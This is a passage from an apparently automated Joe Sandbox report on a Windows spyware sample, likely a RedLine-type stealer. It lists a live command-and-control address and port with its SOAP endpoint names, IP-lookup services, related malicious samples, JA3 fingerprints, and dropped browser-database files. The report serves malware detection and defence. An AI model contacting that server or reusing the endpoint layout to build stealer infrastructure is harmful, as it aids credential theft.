https://api.ip.sb/geoip	false		high
http://45.137.22.227:55615/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://45.137.22.227:55615t-	qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002A78000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	tmp1EAE.tmp.4.dr, tmp1EDF.tmp.4.dr, tmp5866.tmp.4.dr, tmp5855.tmp.4.dr, tmp5844.tmp.4.dr, tmp5877.tmp.4.dr, tmp5854.tmp.4.dr, tmp1ECF.tmp.4.dr, tmp1EE0.tmp.4.dr, tmp5823.tmp.4.dr, tmp5833.tmp.4.dr, tmp1EF1.tmp.4.dr	false		high
http://www.fontbureau.com/designersG	qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	tmp1EAE.tmp.4.dr, tmp1EDF.tmp.4.dr, tmp5866.tmp.4.dr, tmp5855.tmp.4.dr, tmp5844.tmp.4.dr, tmp5877.tmp.4.dr, tmp5854.tmp.4.dr, tmp1ECF.tmp.4.dr, tmp1EE0.tmp.4.dr, tmp5823.tmp.4.dr, tmp5833.tmp.4.dr, tmp1EF1.tmp.4.dr	false		high
http://www.fontbureau.com/designers/?	qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX	qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002921000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers?	qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/EnvironmentSettings	qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002921000.00000004.00000800.00020000.00000000.sdmp, qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002970000.00000004.00000800.00020000.00000000.sdmp	false		high
http://45.137.22.227:55615	qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002921000.00000004.00000800.00020000.00000000.sdmp, qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002A78000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/envelope/	qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002970000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.tiro.com	qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/	qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002970000.00000004.00000800.00020000.00000000.sdmp, qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	tmp1EAE.tmp.4.dr, tmp1EDF.tmp.4.dr, tmp5866.tmp.4.dr, tmp5855.tmp.4.dr, tmp5844.tmp.4.dr, tmp5877.tmp.4.dr, tmp5854.tmp.4.dr, tmp1ECF.tmp.4.dr, tmp1EE0.tmp.4.dr, tmp5823.tmp.4.dr, tmp5833.tmp.4.dr, tmp1EF1.tmp.4.dr	false		high
http://www.fontbureau.com/designers	qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/VerifyUpdateResponse	qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002921000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/SetEnvironment	qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002B57000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/SetEnvironmentResponse	qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002921000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sajatypeworks.com	qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/GetUpdates	qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002A78000.00000004.00000800.00020000.00000000.sdmp, qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002999000.00000004.00000800.00020000.00000000.sdmp, qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002970000.00000004.00000800.00020000.00000000.sdmp, qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.typography.netD	qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/staff/dennis.htm	qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ipify.orgcookies//settinString.Removeg	qJ64p5G1XJ.exe, qJ64p5G1XJ.exe, 00000004.00000002.1856995475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	tmp1EAE.tmp.4.dr, tmp1EDF.tmp.4.dr, tmp5866.tmp.4.dr, tmp5855.tmp.4.dr, tmp5844.tmp.4.dr, tmp5877.tmp.4.dr, tmp5854.tmp.4.dr, tmp1ECF.tmp.4.dr, tmp1EE0.tmp.4.dr, tmp5823.tmp.4.dr, tmp5833.tmp.4.dr, tmp1EF1.tmp.4.dr	false		high
http://www.galapagosdesign.com/DPlease	qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/VerifyUpdate	qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002921000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/0	qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002921000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.urwpp.deDPlease	qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.zhongyicts.com.cn	qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002921000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp, qJ64p5G1XJ.exe, 00000000.00000002.1742529895.0000000005274000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ipinfo.io/ip%appdata%	qJ64p5G1XJ.exe, qJ64p5G1XJ.exe, 00000004.00000002.1856995475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://45.137.22.227:5	qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002B57000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	tmp1EAE.tmp.4.dr, tmp1EDF.tmp.4.dr, tmp5866.tmp.4.dr, tmp5855.tmp.4.dr, tmp5844.tmp.4.dr, tmp5877.tmp.4.dr, tmp5854.tmp.4.dr, tmp1ECF.tmp.4.dr, tmp1EE0.tmp.4.dr, tmp5823.tmp.4.dr, tmp5833.tmp.4.dr, tmp1EF1.tmp.4.dr	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002921000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/CheckConnectResponse	qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002921000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.datacontract.org/2004/07/	qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002A78000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	qJ64p5G1XJ.exe, qJ64p5G1XJ.exe, 00000004.00000002.1856995475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://api.ip.sb	qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002970000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	tmp1EAE.tmp.4.dr, tmp1EDF.tmp.4.dr, tmp5866.tmp.4.dr, tmp5855.tmp.4.dr, tmp5844.tmp.4.dr, tmp5877.tmp.4.dr, tmp5854.tmp.4.dr, tmp1ECF.tmp.4.dr, tmp1EE0.tmp.4.dr, tmp5823.tmp.4.dr, tmp5833.tmp.4.dr, tmp1EF1.tmp.4.dr	false		high
http://tempuri.org/Endpoint/CheckConnect	qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002921000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	tmp1EAE.tmp.4.dr, tmp1EDF.tmp.4.dr, tmp5866.tmp.4.dr, tmp5855.tmp.4.dr, tmp5844.tmp.4.dr, tmp5877.tmp.4.dr, tmp5854.tmp.4.dr, tmp1ECF.tmp.4.dr, tmp1EE0.tmp.4.dr, tmp5823.tmp.4.dr, tmp5833.tmp.4.dr, tmp1EF1.tmp.4.dr	false		high
http://tempuri.org/Endpoint/SetEnviron	qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002B57000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.carterandcone.coml	qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	tmp1EAE.tmp.4.dr, tmp1EDF.tmp.4.dr, tmp5866.tmp.4.dr, tmp5855.tmp.4.dr, tmp5844.tmp.4.dr, tmp5877.tmp.4.dr, tmp5854.tmp.4.dr, tmp1ECF.tmp.4.dr, tmp1EE0.tmp.4.dr, tmp5823.tmp.4.dr, tmp5833.tmp.4.dr, tmp1EF1.tmp.4.dr	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/frere-user.html	qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing	qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002921000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/GetUpdatesResponse	qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002921000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/	qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002921000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers8	qJ64p5G1XJ.exe, 00000000.00000002.1742714701.00000000069E2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	tmp1EAE.tmp.4.dr, tmp1EDF.tmp.4.dr, tmp5866.tmp.4.dr, tmp5855.tmp.4.dr, tmp5844.tmp.4.dr, tmp5877.tmp.4.dr, tmp5854.tmp.4.dr, tmp1ECF.tmp.4.dr, tmp1EE0.tmp.4.dr, tmp5823.tmp.4.dr, tmp5833.tmp.4.dr, tmp1EF1.tmp.4.dr	false		high
http://schemas.xmlsoap.org/soap/actor/next	qJ64p5G1XJ.exe, 00000004.00000002.1859681997.0000000002921000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.26.13.31	api.ip.sb.cdn.cloudflare.net	United States		13335	CLOUDFLARENETUS	false
45.137.22.227	unknown	Netherlands		51447	ROOTLAYERNETNL	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1596766
Start date and time:	2025-01-22 14:11:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	qJ64p5G1XJ.exe renamed because original name is a hash value
Original Sample Name:	D666C758BE2A66A4C8E0D3C089EA75B1.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@8/45@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 52 Number of non-executed functions: 6
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 184.28.90.27, 20.109.210.53, 4.175.87.197, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:11:57	API Interceptor	54x Sleep call for process: qJ64p5G1XJ.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.13.31	VKJITO.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	ip.sb/
45.137.22.227	Hzb1l180P6.exe	Get hash	malicious	Parallax RAT	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ip.sb.cdn.cloudflare.net	VXB84UvyHp.exe	Get hash	malicious	RedLine	Browse	172.67.75.172
api.ip.sb.cdn.cloudflare.net	chTJmCR9bS.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	104.26.12.31

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://app.dam.penzle.com/asset/c9b1ca84-2e6e-4091-8dd7-8eea9a901c0b--105887785658629571096-0797a88c-6d4b-41ed-9b50-9a993107fca0--34868474-c76c-4769-aa1a-4fb9218cd274	Get hash	malicious	Unknown	Browse	104.17.25.14
	lolz.exe	Get hash	malicious	Xmrig	Browse	172.67.19.24
	VQdUvAQ4xO.exe	Get hash	malicious	DCRat, PureLog Stealer, ReverseShell, zgRAT	Browse	104.21.95.93
	https://www.mathemise.com/	Get hash	malicious	Unknown	Browse	172.67.40.50
	https://steursinnovatingforthefuture.freshdesk.com/support/solutions/articles/203000017909-steurs-innovating-for-the-future	Get hash	malicious	Unknown	Browse	104.17.25.14
	random.exe	Get hash	malicious	LummaC Stealer, PureLog Stealer	Browse	104.21.16.1
	http://whatsappweb.net	Get hash	malicious	Unknown	Browse	104.21.16.1
	Bewijs_gerelateerd_aan_inbreuk_op_intellectuele_eigendomsrechten.exe	Get hash	malicious	Unknown	Browse	104.18.86.42
	xow.exe	Get hash	malicious	LummaC	Browse	104.21.78.5
	ATT-897850.htm	Get hash	malicious	HtmlDropper	Browse	172.67.74.152
ROOTLAYERNETNL	chTJmCR9bS.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	185.222.57.84
	RFQ.exe	Get hash	malicious	Quasar, PureLog Stealer	Browse	185.222.57.67
	p0GiAimtNm.exe	Get hash	malicious	RedLine	Browse	185.222.58.237
	nzLoHpgAln.exe	Get hash	malicious	RedLine	Browse	185.222.57.76
	ljMiHZ8MwZ.exe	Get hash	malicious	RedLine	Browse	45.137.22.250
	aYf5ibGObB.exe	Get hash	malicious	RedLine	Browse	185.222.58.90
	K3xL5Xy0XS.exe	Get hash	malicious	RedLine	Browse	185.222.58.90
	Invoice-BL. Payment TT $ 16945.99.exe	Get hash	malicious	RedLine	Browse	45.137.22.164
	MfzXU6tKOq.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	185.222.58.82
	lWnSA7IyVc.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	185.222.58.229

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	299371485_14108825808_1736351479899.exe	Get hash	malicious	ReverseShell, Snake Keylogger, VIP Keylogger	Browse	104.26.13.31
	BANK FORM_pdf.exe	Get hash	malicious	MassLogger RAT	Browse	104.26.13.31
	MTNP240444042266.exe	Get hash	malicious	ReverseShell, Snake Keylogger	Browse	104.26.13.31
	VXB84UvyHp.exe	Get hash	malicious	RedLine	Browse	104.26.13.31
	PO1234.001.exe	Get hash	malicious	MassLogger RAT	Browse	104.26.13.31
	Ref50102607UUU.exe	Get hash	malicious	MassLogger RAT	Browse	104.26.13.31
	Payment Error.cmd.exe	Get hash	malicious	ReverseShell, Snake Keylogger	Browse	104.26.13.31
	IMG_50117302.exe	Get hash	malicious	MassLogger RAT	Browse	104.26.13.31
	Remittance Copy.exe	Get hash	malicious	MassLogger RAT	Browse	104.26.13.31
	Halkbank Ekstre.pdf.exe	Get hash	malicious	ReverseShell, Snake Keylogger, VIP Keylogger	Browse	104.26.13.31

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Temp\tmp1E8B.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1E8C.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1E9D.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1E9E.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1EAE.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1ECF.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1EDF.tmp

Download File

Process:	C:\Users\user\Desktop\qJ64p5G1XJ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1EE0.tmp
